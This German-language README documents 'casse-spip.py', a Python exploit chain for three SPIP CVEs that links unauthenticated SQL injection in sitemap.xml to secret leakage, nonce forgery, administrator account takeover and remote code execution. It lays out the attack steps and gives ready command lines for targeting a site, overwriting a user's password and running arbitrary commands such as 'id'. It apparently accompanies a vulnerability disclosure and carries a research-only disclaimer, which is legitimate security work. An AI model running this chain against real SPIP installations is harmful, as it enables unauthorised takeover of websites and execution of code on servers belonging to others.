
Python-Exploit-Kette für SPIP CVEs 2026-72708/72709/72710, die unauthentifizierte SQL-Injection mit Account-Übernahme und Remote-Code-Ausführung verkettet.
Exploit für CVE-2026-72708, CVE-2026-72709 und CVE-2026-72710, entdeckt von Franck Chevalier (Wayko)
Für einen vollständigen technischen Deep Dive lesen Sie den vollständigen Artikel im Lexfo-Blog.
Dieses Repository wird ausschließlich für Forschungs- und defensive Sicherheitszwecke bereitgestellt. Der Autor übernimmt keine Verantwortung für den Missbrauch dieser Informationen.
Der Einstiegspunkt ist eine SQL-Injection in der öffentlichen sitemap.xml-Seite, um alea_ephemere auszuleaken.
Mit diesem Secret können gültige Nonces für anonyme Aktionen gefälscht werden.
Zwei Aktionen führen von dort aus zu RCE:
action=editer_auteur Account-Übernahme, dann RCE aus dem privaten Bereich.action=editer_objet Mass Assignment, um eine Zeile in die spip_jobs-Warteschlange zu schreiben und sie dann über action=cron auszuführen.python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"
Vor dem Überschreiben gibt --ato den login und den aktuellen pass-Hash des Ziels aus
(über die SQLi), sodass Sie ihn anschließend mit --restore-hash wiederherstellen können:
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"
Die Datei wird nach IMG/casse-spip_<token>.html geschrieben.